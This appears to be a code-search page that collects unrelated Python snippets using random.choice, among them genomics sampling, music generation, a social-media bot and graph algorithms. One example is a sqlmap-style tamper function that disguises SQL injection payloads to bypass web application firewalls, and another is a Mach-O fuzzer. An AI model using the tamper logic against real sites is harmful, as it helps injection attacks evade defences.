            dists.append(min_dist)
        except :
            err_str = 'Warning: no genes were found for sequence with header' \
                         ' %s, not using to calculate distributions.\n'%header
            sys.stderr.write(err_str)

        # calculate # bases
        sizes.append(len(seq))

    # GC content distribution for the foreground sequences
    gc_dist = get_gc_content_distribution(fg_dict.values(),bins=bins)

    # max_gc is # peaks w/ highest GC content
    max_gc = max(gc_dist)

    # gene_starts is a list of all genes in (chromosome,gene start) tuples
    gene_starts=[]
    for key in tss.keys():
        chrom=key.split('chr')[-1]
        for x in tss[key]:
            gene_starts.append((key,x[0]))

    # encapsulated function for proposing sequences
    def propose_sequence(dists, gene_starts, sizes, nib_db) :
        # sample a random distance from the list of distances
        d = random.choice(dists)

        # pick a random gene
        chrom, coord = random.choice(gene_starts)

        # propose a starting point for the bg sequence
        midpoint = coord-d+random.randint(-100,100)

        # propose a size for the bg sequence
        size = random.choice(sizes)
        start = int(midpoint-int(size/2))
        stop = int(midpoint+int(size/2))

        #sys.stderr.write("%s:coord=%d size=%d midpoint=%d d=%d\n"%(chrom,coord,size,midpoint,d))
        # if start or stop are negative, skip and try again
        if start < 0 or stop < 0 : seq = None

        # randomly choose strand
        strand = '+' if random.random() > 0.5 else '-'

        # extract the proposed sequence
        try :
            nib_title, seq = nib_db.get_fasta(chrom,start,stop,strand)
        except IOError, e :
            if verbose : sys.stderr.write('IOError in NibDB, skipping: %s,%d-%d,%s\n'%(chrom,start,stop,strand))
            seq = None
        except NibException, e :
            if verbose : sys.stderr.write('NibDB.get_fasta error, %s\n'%e)
            seq = None

        header = '%s:%d-%d'%(chrom,start,stop)

        return header, seq


    # build gc content distribution based on seq length and
    # distance from TSS foreground distributions
    # keep sampling sequences until the distribution stops
    # changing a lot (KL divergence < epsilon)
    bg_gc_cnts = [1.]*bins
    converged = False
    epsilon = bg_match_epsilon
    if verbose : sys.stderr.write('Building empirical background GC content distribution\n')
    while not converged :

        # propose a sequence
        header, seq = propose_sequence(dists,gene_starts,sizes,nib_db)

        # sometimes this happens when there is an error, just try again
        if seq is None :
            continue

        # determine the GC bin for this sequence
        gc_content = get_gc_content(seq)
        gc_bin = -1
        for i in range(bins) :
            win_start = i/float(bins)
            win_end = (i+1)/float(bins)
            if gc_content >= win_start and gc_content < win_end :
                gc_bin = i
                break

        # update the gc content distribution
        sum_cnts = float(sum(bg_gc_cnts))
        if sum_cnts != 0 : # ! on first sequence

            # calculate the current distributions
            last_gc_p = map(lambda x:x/sum_cnts,bg_gc_cnts)
            bg_gc_cnts[gc_bin] += 1
            new_gc_p = map(lambda x:x/sum_cnts,bg_gc_cnts)

            # calculate the kl divergence between last distribution
            # and current one, stopping if less than epsilon
            kl_d = kl_divergence(new_gc_p,last_gc_p)
            if verbose : sys.stderr.write('dist to converge: %.3g\r'%(kl_d-epsilon))
            if kl_d < epsilon :
                converged = True

        else :
            bg_gc_cnts[gc_bin] += 1

    if verbose : sys.stderr.write('\ndone\n')

    # add pseudocounts to account for missing data in bg as to avoid
    # inappropriate scaling in rejection sampling step
    # the fg bin with the largest value that corresponds to an empty
    # bg bin is used to calculate the number of pseudocounts so that
    # the resulting bg bin has the same propotion of counts in it as
    # the original fg bin.  This is calculated as:
    #
    # x_{pseudo} = \frac{p_i\sum_{i=1}^{N}a_i}{1-p_iN}
    #
    # where p_i is the value of the max fg bin w/ zero in the bg bin
    # x_{pseudo} is added to every bin
    pseudocounts = 0
    for fg_i, bg_i in zip(gc_dist,bg_gc_cnts) :
        if fg_i != 0 and bg_i == 0 and fg_i*len(fg_dict) > pseudocounts :
            # if fg_i > 1/sum(bg_gc_cnts) this won't work, but that *shouldn't*
            # ever happen
            if fg_i >= 1./sum(bg_gc_cnts) :
                raise Exception('There was a numeric issue in the rejection sampling routine, please try it again')
            sys.stderr.write(str([fg_i,sum(bg_gc_cnts),len(bg_gc_cnts),1.*fg_i*len(bg_gc_cnts),bg_gc_cnts])+'\n')
            sys.stderr.flush()
            pseudocounts = (fg_i*sum(bg_gc_cnts))/(1-1.*fg_i*len(bg_gc_cnts))

    bg_gc_cnts = map(lambda x: x+pseudocounts/sum(bg_gc_cnts),bg_gc_cnts)
    bg_gc_dist = map(lambda x: x/sum(bg_gc_cnts),bg_gc_cnts)

    # last, find the multiplier that causes the background gc distribution to
    # envelope the foreground gc dist
    z_coeff = gc_dist[0]/bg_gc_dist[0]
    for fg_i, bg_i in zip(gc_dist[1:],bg_gc_dist[1:]) :
        z_coeff = max(z_coeff,fg_i/bg_i)
    bg_gc_dist = map(lambda x: x*z_coeff,bg_gc_dist)

    # start generating bg sequences
    bg_dict = {}

    bg_gcs,bg_sizes=[],[]

    # generate a bg sequence for every fg sequence
    for i in range(num_samples):
        if verbose : sys.stderr.write('%d/%d'%(i,num_samples))

        # propose sequences until one is accepted
        accepted_sequence = False
        while not accepted_sequence:
            if verbose : sys.stderr.write('.')

            # propose a sequence
            header, seq = propose_sequence(dists,gene_starts,sizes,nib_db)

            # problem occured in proposing sequence, just keep going
            if seq is None : continue

            # determine the GC bin for this sequence
            gc_content = get_gc_content(seq)
            gc_bin = -1
            for i in range(bins) :
                win_start = i/float(bins)
                win_end = (i+1)/float(bins)
                if gc_content >= win_start and gc_content < win_end :
                    gc_bin = i
                    continue

            # pick a uniform random number such that it does not exceed
            # the maximum GC content distribution over bins
            # if the random number is <= the GC content for this
            # proposed sequence, accept, otherwise reject
            r = random.random() * bg_gc_dist[gc_bin]
            if r > gc_dist[gc_bin] :
                continue
            else:
                bg_gcs.append(x)
                #bg_sizes.append(size)
                accepted_sequence = True
                bg_dict[header] = seq

        if verbose : sys.stderr.write('\r')
    return bg_dict

Example 18

Project: pablo
Source File: heuristics.py
View license
def build_bar(songs, n, prev_sample=None, coherent=True, tracks=[], bar_position=0, recur=0):
    """
    Builds a bar of n beats in length,
    where n >= the shortest sample length.

        e.g. if the samples are cut into bars of 8, 16, 32,
        then n must be >= 8.

    Bars are constructed by selecting a sample of length n
    or by placing two adjacent bars of length n/2. This structure
    *should* produce more coherent (less spastic) tracks.

        e.g a bar of length 16 can be created by two samples of length 8
        or one sample of length 16, if available.

    A bar is returned as a list of samples.

    If `coherent=True`, Pablo will try to build _coherent_ bars:

        - higher probability that the same sample will be re-played
        - higher probability that the next sample in the sequence will be played
        - lower probability that the next sample will be from a different song

    This assumes that the samples are in their chronological sequence.
    That is, that samples i and i+1 for a song are temporally adjacent.

    Returns a list of Samples.
    """
    if len(tracks) > len(songs):
        raise Exception('Must have more songs available than overlaid tracks')

    # Remove any songs which are simultaneously playing in other tracks
    # over the length of this bar
    min_size = min(s.min_size for s in songs)
    invalid_songs = []
    for track in tracks:
        for i in range(n/min_size):
            invalid_songs.append(track[bar_position+i].song)
    valid_songs = [s for s in songs if s not in invalid_songs]

    # ugh, well we can overlap songs, I _guess_...
    if not valid_songs:
        valid_songs = [random.choice(songs)]

    # Find samples of length n
    full_bar_samples = {}
    for song in valid_songs:
        if n in song.sizes:
            full_bar_samples[song.name] = [s for s in song[n] if s is not None]

    min_size = min(s.min_size for s in valid_songs)

    if n < min_size:
        raise Exception('Can\'t create a bar shorter than the shortest sample')

    # If this is the smallest sample size,
    # we can only return full bars.
    # Otherwise, slightly favor complete bars, if available
    if n == min_size or (full_bar_samples and random.random() <= 0.6):
        if coherent:
            return _select_sample(full_bar_samples, n, prev_sample)
        else:
            song = random.choice(full_bar_samples.keys())
            return random.choice(full_bar_samples[song])

    # Otherwise, assemble the bar from sub-bars
    bar = []
    length = 0
    while length < n:
        n_ = n/2
        bar += build_bar(songs, n_, prev_sample=prev_sample, bar_position=bar_position, tracks=tracks)
        bar_position += n_/min_size
        length += n_
        prev_sample = bar[-1]

    return bar

Example 19

Project: QRobot
Source File: robot.py
View license
def run():
    client = login.login()
    lastid = loadLastId()
    inter = 50 #检查间隔

    #启动时的测试微博
    client.statuses.update.post(status="test...!") 
    log = "服务器再次启动! "
    print log
   
    while True:
        try:
            inter += 1 #加1秒
            now = time.strftime('%M%S',time.localtime(time.time()))
            hour = time.strftime('%H',time.localtime(time.time()))

            #每天凌晨1点重新授权
            if hour == '01' and now == '0000':
                break

            #由于weibo API限制,不能发布自己可见微博,所以我设置了一个密友可见,密友即为我自己的另外一个账号,用来监控cpu温度和运行时间
            if hour == '00' and now == '0000':
                print "sending a monitor weibo"
                monitor_info = monitor.monitor_cpu_temp()
                monitor_info += monitor.monitor_runtime()
                monitor_info += monitor.monitor_http()
                try:
                    client.statuses.update.post(status=monitor_info, visible = 2)
                except:
                    pass

                log = "Send a monitor weibo succesfully! 时分秒:%s%s \n" %(hour,now)
                print log
                storeLog(log)


            #发微
            if now == '4500' and hour in ['07', '12', '11', '17','18','20','22','23']:
                print 'sending a normal weibo'
                monitor_info = ""
                if random.choice(range(2)):
                    monitor_info += monitor.monitor_cpu_temp()
                elif random.choice(range(2)):
                    monitor_info += monitor.monitor_http()
                else:
                    monitor_info += monitor.monitor_runtime()

                greeting = ""
                greeting += greet.hello(hour)
                myPic = loadpic.pic()
                
                if random.choice(range(2)):
                    content = '%s' %(greeting)
                else:
                    content = '%s%s' %(greeting, monitor_info)
                try:
                    #随机选择发图或者不发图,1/2可能性发图
                    if random.choice(range(2)):
                        client.statuses.update.post(status=content)
                    else:
                        client.statuses.upload.post(status=content, pic = myPic)                
                except Exception, e:
                    print e 

                myPic.close()
                
                log = "Send a normal weibo succesfully! 时分秒:%s%s \n" %(hour,now)
                print log
                storeLog(log)

                time.sleep(1)

            #对最新 @我 的进行回复,50s一次,包括评论原创微博,回复评论
            if inter > 50:
                try:                    
                    #对最新 @我 的原创微博进行评论#

                    #获取原创的最新微博的id
                    lastid = loadLastId()
                    mentions = client.statuses.mentions.get(since_id = lastid, filter_by_type = 1)
                    for weiboInfo in mentions['statuses']:
                        lastid = weiboInfo['id']
                        print lastid
                        storeLastId(lastid)

                        myComment = ""
                        myComment = greet.comment()
                        client.comments.create.post(id = lastid, comment = myComment)
                        log = 'send a comment successfully! 时分秒:%s%sid:%d comment:%s \n' %(hour, now, lastid, myComment)
                        print log
                        storeLog(log)

                    #对最新 @我 的评论进行回复#
                    lastCommentid = loadLastId(False)
                    mentions = client.comments.mentions.get(since_id = lastCommentid)
                    for weiboInfo in mentions['comments']:
                        lastCommentid = weiboInfo['id'] #评论的id
                        lastPostId = weiboInfo['status']['id'] #微博的id
                        print "评论的id:%d 微博的id:%d" % (lastCommentid,lastPostId)
                        storeLastId(lastCommentid, False)

                        myComment = greet.comment()                       
                        client.comments.reply.post(id = lastPostId, cid = lastCommentid, comment = myComment)
                        log = 'replay a comment successfully! 时分秒:%s%s id:%d comment:%s \n' %(hour, now, lastid, myComment)
                        print log
                        storeLog(log)

                except Exception, e:
                    print e

                inter = 0




            time.sleep(1)#while循环每次间隔一秒



        except Exception, e:
            print e

Example 20

Project: golismero
Source File: space2mssqlblank.py
View license
def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with a random blank character from a
    valid set of alternate characters

    Requirement:
        * Microsoft SQL Server

    Tested against:
        * Microsoft SQL Server 2000
        * Microsoft SQL Server 2005

    Notes:
        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    'SELECT%0Eid%0DFROM%07users'
    """

    # ASCII table:
    #   SOH     01      start of heading
    #   STX     02      start of text
    #   ETX     03      end of text
    #   EOT     04      end of transmission
    #   ENQ     05      enquiry
    #   ACK     06      acknowledge
    #   BEL     07      bell
    #   BS      08      backspace
    #   TAB     09      horizontal tab
    #   LF      0A      new line
    #   VT      0B      vertical TAB
    #   FF      0C      new page
    #   CR      0D      carriage return
    #   SO      0E      shift out
    #   SI      0F      shift in
    blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')
    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace, end = False, False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += random.choice(blanks)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == '#' or payload[i:i + 3] == '-- ':
                end = True

            elif payload[i] == " " and not doublequote and not quote:
                if end:
                    retVal += random.choice(blanks[:-1])
                else:
                    retVal += random.choice(blanks)

                continue

            retVal += payload[i]

    return retVal

Example 21

Project: deepjazz
Source File: grammar.py
View license
def unparse_grammar(m1_grammar, m1_chords):
    m1_elements = stream.Voice()
    currOffset = 0.0 # for recalculate last chord.
    prevElement = None
    for ix, grammarElement in enumerate(m1_grammar.split(' ')):
        terms = grammarElement.split(',')
        currOffset += float(terms[1]) # works just fine

        # Case 1: it's a rest. Just append
        if terms[0] == 'R':
            rNote = note.Rest(quarterLength = float(terms[1]))
            m1_elements.insert(currOffset, rNote)
            continue

        # Get the last chord first so you can find chord note, scale note, etc.
        try: 
            lastChord = [n for n in m1_chords if n.offset <= currOffset][-1]
        except IndexError:
            m1_chords[0].offset = 0.0
            lastChord = [n for n in m1_chords if n.offset <= currOffset][-1]

        # Case: no < > (should just be the first note) so generate from range
        # of lowest chord note to highest chord note (if not a chord note, else
        # just generate one of the actual chord notes). 

        # Case #1: if no < > to indicate next note range. Usually this lack of < >
        # is for the first note (no precedent), or for rests.
        if (len(terms) == 2): # Case 1: if no < >.
            insertNote = note.Note() # default is C

            # Case C: chord note.
            if terms[0] == 'C':
                insertNote = __generate_chord_tone(lastChord)

            # Case S: scale note.
            elif terms[0] == 'S':
                insertNote = __generate_scale_tone(lastChord)

            # Case A: approach note.
            # Handle both A and X notes here for now.
            else:
                insertNote = __generate_approach_tone(lastChord)

            # Update the stream of generated notes
            insertNote.quarterLength = float(terms[1])
            if insertNote.octave < 4:
                insertNote.octave = 4
            m1_elements.insert(currOffset, insertNote)
            prevElement = insertNote

        # Case #2: if < > for the increment. Usually for notes after the first one.
        else:
            # Get lower, upper intervals and notes.
            interval1 = interval.Interval(terms[2].replace("<",''))
            interval2 = interval.Interval(terms[3].replace(">",''))
            if interval1.cents > interval2.cents:
                upperInterval, lowerInterval = interval1, interval2
            else:
                upperInterval, lowerInterval = interval2, interval1
            lowPitch = interval.transposePitch(prevElement.pitch, lowerInterval)
            highPitch = interval.transposePitch(prevElement.pitch, upperInterval)
            numNotes = int(highPitch.ps - lowPitch.ps + 1) # for range(s, e)

            # Case C: chord note, must be within increment (terms[2]).
            # First, transpose note with lowerInterval to get note that is
            # the lower bound. Then iterate over, and find valid notes. Then
            # choose randomly from those.
            
            if terms[0] == 'C':
                relevantChordTones = []
                for i in xrange(0, numNotes):
                    currNote = note.Note(lowPitch.transpose(i).simplifyEnharmonic())
                    if __is_chord_tone(lastChord, currNote):
                        relevantChordTones.append(currNote)
                if len(relevantChordTones) > 1:
                    insertNote = random.choice([i for i in relevantChordTones
                        if i.nameWithOctave != prevElement.nameWithOctave])
                elif len(relevantChordTones) == 1:
                    insertNote = relevantChordTones[0]
                else: # if no choices, set to prev element +-1 whole step
                    insertNote = prevElement.transpose(random.choice([-2,2]))
                if insertNote.octave < 3:
                    insertNote.octave = 3
                insertNote.quarterLength = float(terms[1])
                m1_elements.insert(currOffset, insertNote)

            # Case S: scale note, must be within increment.
            elif terms[0] == 'S':
                relevantScaleTones = []
                for i in xrange(0, numNotes):
                    currNote = note.Note(lowPitch.transpose(i).simplifyEnharmonic())
                    if __is_scale_tone(lastChord, currNote):
                        relevantScaleTones.append(currNote)
                if len(relevantScaleTones) > 1:
                    insertNote = random.choice([i for i in relevantScaleTones
                        if i.nameWithOctave != prevElement.nameWithOctave])
                elif len(relevantScaleTones) == 1:
                    insertNote = relevantScaleTones[0]
                else: # if no choices, set to prev element +-1 whole step
                    insertNote = prevElement.transpose(random.choice([-2,2]))
                if insertNote.octave < 3:
                    insertNote.octave = 3
                insertNote.quarterLength = float(terms[1])
                m1_elements.insert(currOffset, insertNote)

            # Case A: approach tone, must be within increment.
            # For now: handle both A and X cases.
            else:
                relevantApproachTones = []
                for i in xrange(0, numNotes):
                    currNote = note.Note(lowPitch.transpose(i).simplifyEnharmonic())
                    if __is_approach_tone(lastChord, currNote):
                        relevantApproachTones.append(currNote)
                if len(relevantApproachTones) > 1:
                    insertNote = random.choice([i for i in relevantApproachTones
                        if i.nameWithOctave != prevElement.nameWithOctave])
                elif len(relevantApproachTones) == 1:
                    insertNote = relevantApproachTones[0]
                else: # if no choices, set to prev element +-1 whole step
                    insertNote = prevElement.transpose(random.choice([-2,2]))
                if insertNote.octave < 3:
                    insertNote.octave = 3
                insertNote.quarterLength = float(terms[1])
                m1_elements.insert(currOffset, insertNote)

            # update the previous element.
            prevElement = insertNote

    return m1_elements    

Example 22

Project: nightmare
Source File: macho_mutator.py
View license
  def do_fuzz_headers(self):
    # Select a random header
    header = random.choice(self.macho.headers)
    idx = self.macho.headers.index(header)
    self.changes.append(["Header %d" % idx])
    prop = random.choice(self.fuzz_sub_properties["headers"])

    if prop == "header":
      fields = random.choice(header.header._fields_)
      field = fields[0]
      
      change_name = "header %d field %s" % (idx, field)
      if change_name in self.change_list or field in BANNED_FIELDS:
        #print "Ignoring already applied change %s" % change_name
        del self.changes[len(self.changes)-1]
        return

      self.changes[len(self.changes)-1].append("Field %s" % field)
      l = "header.header.%s = %d" % (field, get_random_value(fields[1]))
      exec(l)
      
      self.change_list.append(change_name)
    elif prop == "commands":
      cmd = random.choice(header.commands)
      idx = header.commands.index(cmd)
      self.changes[len(self.changes)-1].append("Command %d" % idx)
      
      subidx = random.randint(0, len(cmd)-1)
      subcmd = cmd[subidx]

      if '_fields_' in dir(subcmd):
        if len(subcmd._fields_) > 0:
          fields = random.choice(subcmd._fields_)
          field = fields[0]
          self.changes[len(self.changes)-1].append("Field %s" % field)
          str_type = str(type(eval("subcmd.%s" % field)))
          if str_type in SUPPORTED_FIELD_TYPES:
            l = "subcmd.%s = " % field
            l += str(get_random_value(fields[1]))
            exec(l)
          else:
            #print "Ignoring unsupported field type", str_type, field
            del self.changes[len(self.changes)-1]
        else:
          print "Ignoring empty subcmd", subcmd
          del self.changes[len(self.changes)-1]
      elif type(subcmd) is str:
        #print "Ignoring unsupported (by macholib) string sub-command"
        del self.changes[len(self.changes)-1]
      else:
        print type(subcmd), subcmd
        if type(subcmd) is list and len(subcmd) > 0:
          field = random.choice(subcmd)
          subidx = subcmd.index(field)
          self.changes[len(self.changes)-1].append("List element %d" % subcmd.index(field))

          fields = random.choice(field._fields_)
          field_name = fields[0]
          self.changes[len(self.changes)-1].append("Field %s" % field_name)

          l = "field.%s = " % field_name
          l += str(get_random_value(fields[1]))
          exec(l)
        else:
          del self.changes[len(self.changes)-1]
      #self.changes[len(self.changes)-1].append("Sub-command %d" % sub_idx)
    elif prop == "headers":
      del self.changes[len(self.changes)-1]
      #print "Not yet supported headers"
      #raise Exception("Implement headers")
    else:
      del self.changes[len(self.changes)-1]

Example 23

Project: learning-greek
Source File: alphabet.py
View license
    def construct_quiz(self):

        pronunciation = [
            (u"Α", "ah"),
            (u"Β", "v"),
            (u"Γ", "gh, y, ng"),
            (u"Δ", "dh"),
            (u"Ε", u"ĕ"),
            (u"Ζ", "z"),
            (u"Η", u"ē"),
            (u"Θ", "th"),
            (u"Ι", "i, y"),
            (u"Κ", "k"),
            (u"Λ", "l"),
            (u"Μ", "m"),
            (u"Ν", "n"),
            (u"Ξ", "ks"),
            (u"Ο", "o"),
            (u"Π", "p"),
            (u"Ρ", "r"),
            (u"Σ", "s"),
            (u"Τ", "t"),
            (u"Υ", u"ü, v"),
            (u"Φ", "f"),
            (u"Χ", "x, ch"),
            (u"Ψ", "ps"),
            (u"Ω", "o"),
            (u"ΑΙ", u"ĕ"),
            (u"ΕΙ", "i"),
            (u"OI", u"ü"),
            (u"ΟΥ", "u"),
            (u"ΑΥ", "av, af"),
            (u"ΕΥ", u"ĕv, ĕf"),
            (u"ΗΥ", "ev, ef"),
            (u"Αι", u"ĕ"),
            (u"Ει", "i"),
            (u"Oι", u"ü"),
            (u"Ου", "u"),
            (u"Αυ", "av, af"),
            (u"Ευ", u"ĕv, ĕf"),
            (u"Ηυ", "ev, ef"),
            (u"ΓΓ", "ngg"),
            (u"ΓΚ", "ngk"),
            (u"ΓΧ", "ngch"),
            (u"α", "ah"),
            (u"β", "v"),
            (u"γ", "gh, y, ng"),
            (u"δ", "dh"),
            (u"ε", u"ĕ"),
            (u"ζ", "z"),
            (u"η", u"ē"),
            (u"θ", "th"),
            (u"ι", "i, y"),
            (u"κ", "k"),
            (u"λ", "l"),
            (u"μ", "m"),
            (u"ν", "n"),
            (u"ξ", "ks"),
            (u"ο", "o"),
            (u"π", "p"),
            (u"ρ", "r"),
            (u"σ", "s"),
            (u"ς", "s"),
            (u"τ", "t"),
            (u"υ", u"ü, v"),
            (u"φ", "f"),
            (u"χ", "x, ch"),
            (u"ψ", "ps"),
            (u"ω", "o"),
            (u"αι", u"ĕ"),
            (u"ει", "i"),
            (u"οι", u"ü"),
            (u"ου", "u"),
            (u"αυ", "av, af"),
            (u"ευ", u"ĕv, ĕf"),
            (u"ηυ", "ev, ef"),
            (u"γγ", "ngg"),
            (u"γκ", "ngk"),
            (u"γχ", "ngch"),
        ]

        questions = []

        while len(questions) < 10:
            letter1 = random.choice(pronunciation)
            letter2 = random.choice(pronunciation)
            if letter1[1] == letter2[1]:
                continue

            choices = random.sample([letter1, letter2], 2)
            question = random.choice(choices)

            if question[1] in [q[2] for q in questions]:
                continue

            questions.append((question[0], [choice[1] for choice in choices], question[1]))

        return questions

Example 24

Project: simoorg
Source File: KafkaTopology.py
View license
    def get_random_node(self):
        """
            Get a hostname of broker to induce failure on
            Args:
                None
            Return:
                hostname
        """
        failure = random.choice(self.plan)

        if failure.get_node_type() == "RANDOM_BROKER":
            if failure.get_topic() is None:
                topic = self.helper.get_topic()
                partition = self.helper.get_partition(topic)
                self.logger_instance.logit("INFO",
                                           "Selecting a random broker"
                                           " for a Random Topic : {0},"
                                           " Random Partition : {1}"
                                           .format(topic, partition),
                                           log_level="VERBOSE")
                isr_list = self.helper.get_isr(topic, partition)
                return random.choice(isr_list)
            else:
                topic = failure.get_topic()
                # check if the partition is specified for the topic
                if failure.get_partition() is not None:
                    partition = failure.get_partition()
                    self.logger_instance.logit("INFO",
                                               "Selecting a random broker"
                                               " for a Specified Topic : {0},"
                                               " Specified Partition : {1}"
                                               .format(topic, partition),
                                               log_level="VERBOSE")
                else:
                    # get a random partition
                    partition = self.helper.get_partition(topic)
                    self.logger_instance.logit("INFO",
                                               "Selecting a random broker"
                                               " for a Specified Topic : {0},"
                                               " Random Partition : {1}"
                                               .format(topic, partition),
                                               log_level="VERBOSE")
                isr_list = self.helper.get_isr(topic, partition)
                return random.choice(isr_list)

        elif failure.get_node_type() == "RANDOM_LEADER":
            topic = self.helper.get_topic()
            partition = self.helper.get_partition(topic)
            self.logger_instance.logit("INFO",
                                       "Selecting a Leader for a"
                                       " Random Topic : {0},"
                                       " Random Partition : {1}"
                                       .format(topic, partition),
                                       log_level="VERBOSE")
            return self.helper.get_leader(topic, partition)

        elif failure.get_node_type() == "LEADER":
            topic = failure.get_topic()
            # check if the partition is specified for the topic
            if failure.get_partition() is not None:
                partition = failure.get_partition()
                self.logger_instance.logit("INFO",
                                           "Selecting a Leader"
                                           " for a Specified Topic"
                                           " : {0}, Specified Partition"
                                           " : {1}".format(topic, partition),
                                           log_level="VERBOSE")
            else:
                # get a random partition
                partition = self.helper.get_partition(topic)
                self.logger_instance.logit("INFO",
                                           "Selecting a Leader"
                                           " for a Specified Topic"
                                           " : {0}, Random Partition"
                                           " : {1}".format(topic, partition),
                                           log_level="VERBOSE")
            return self.helper.get_leader(topic, partition)

        elif failure.get_node_type() == "CONTROLLER":
            self.logger_instance.logit("INFO",
                                       "Selecting Controller",
                                       log_level="VERBOSE")
            return self.helper.get_controller()

Example 25

Project: networkx
Source File: swap.py
View license
def connected_double_edge_swap(G, nswap=1, _window_threshold=3):
    """Attempts the specified number of double-edge swaps in the graph `G`.

    A double-edge swap removes two randomly chosen edges `(u, v)` and `(x,
    y)` and creates the new edges `(u, x)` and `(v, y)`::

     u--v            u  v
            becomes  |  |
     x--y            x  y

    If either `(u, x)` or `(v, y)` already exist, then no swap is performed
    so the actual number of swapped edges is always *at most* `nswap`.

    Parameters
    ----------
    G : graph
       An undirected graph

    nswap : integer (optional, default=1)
       Number of double-edge swaps to perform

    _window_threshold : integer

       The window size below which connectedness of the graph will be checked
       after each swap.

       The "window" in this function is a dynamically updated integer that
       represents the number of swap attempts to make before checking if the
       graph remains connected. It is an optimization used to decrease the
       running time of the algorithm in exchange for increased complexity of
       implementation.

       If the window size is below this threshold, then the algorithm checks
       after each swap if the graph remains connected by checking if there is a
       path joining the two nodes whose edge was just removed. If the window
       size is above this threshold, then the algorithm performs do all the
       swaps in the window and only then check if the graph is still connected.

    Returns
    -------
    int
       The number of successful swaps

    Raises
    ------

    NetworkXError

       If the input graph is not connected, or if the graph has fewer than four
       nodes.

    Notes
    -----

    The initial graph `G` must be connected, and the resulting graph is
    connected. The graph `G` is modified in place.

    References
    ----------
    .. [1] C. Gkantsidis and M. Mihail and E. Zegura,
           The Markov chain simulation method for generating connected
           power law random graphs, 2003.
           http://citeseer.ist.psu.edu/gkantsidis03markov.html
    """
    if not nx.is_connected(G):
        raise nx.NetworkXError("Graph not connected")
    if len(G) < 4:
        raise nx.NetworkXError("Graph has less than four nodes.")
    n = 0
    swapcount = 0
    deg = G.degree()
    # Label key for nodes
    dk = list(n for n, d in G.degree())
    cdf = nx.utils.cumulative_distribution(list(d for n, d in G.degree()))
    window = 1
    while n < nswap:
        wcount = 0
        swapped = []
        # If the window is small, we just check each time whether the graph is
        # connected by checking if the nodes that were just separated are still
        # connected.
        if window < _window_threshold:
            # This Boolean keeps track of whether there was a failure or not.
            fail = False
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                # If G remains connected...
                if nx.has_path(G, u, v):
                    wcount += 1
                # Otherwise, undo the changes.
                else:
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                    fail = True
            # If one of the swaps failed, reduce the window size.
            if fail:
                window = int(math.ceil(window / 2))
            else:
                window += 1
        # If the window is large, then there is a good chance that a bunch of
        # swaps will work. It's quicker to do all those swaps first and then
        # check if the graph remains connected.
        else:
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                wcount += 1
            # If the graph remains connected, increase the window size.
            if nx.is_connected(G):
                window += 1
            # Otherwise, undo the changes from the previous window and decrease
            # the window size.
            else:
                while swapped:
                    (u, v, x, y) = swapped.pop()
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                window = int(math.ceil(window / 2))
    return swapcount

Example 26

Project: networkx
Source File: swap.py
View license
def connected_double_edge_swap(G, nswap=1, _window_threshold=3):
    """Attempts the specified number of double-edge swaps in the graph `G`.

    A double-edge swap removes two randomly chosen edges `(u, v)` and `(x,
    y)` and creates the new edges `(u, x)` and `(v, y)`::

     u--v            u  v
            becomes  |  |
     x--y            x  y

    If either `(u, x)` or `(v, y)` already exist, then no swap is performed
    so the actual number of swapped edges is always *at most* `nswap`.

    Parameters
    ----------
    G : graph
       An undirected graph

    nswap : integer (optional, default=1)
       Number of double-edge swaps to perform

    _window_threshold : integer

       The window size below which connectedness of the graph will be checked
       after each swap.

       The "window" in this function is a dynamically updated integer that
       represents the number of swap attempts to make before checking if the
       graph remains connected. It is an optimization used to decrease the
       running time of the algorithm in exchange for increased complexity of
       implementation.

       If the window size is below this threshold, then the algorithm checks
       after each swap if the graph remains connected by checking if there is a
       path joining the two nodes whose edge was just removed. If the window
       size is above this threshold, then the algorithm performs do all the
       swaps in the window and only then check if the graph is still connected.

    Returns
    -------
    int
       The number of successful swaps

    Raises
    ------

    NetworkXError

       If the input graph is not connected, or if the graph has fewer than four
       nodes.

    Notes
    -----

    The initial graph `G` must be connected, and the resulting graph is
    connected. The graph `G` is modified in place.

    References
    ----------
    .. [1] C. Gkantsidis and M. Mihail and E. Zegura,
           The Markov chain simulation method for generating connected
           power law random graphs, 2003.
           http://citeseer.ist.psu.edu/gkantsidis03markov.html
    """
    if not nx.is_connected(G):
        raise nx.NetworkXError("Graph not connected")
    if len(G) < 4:
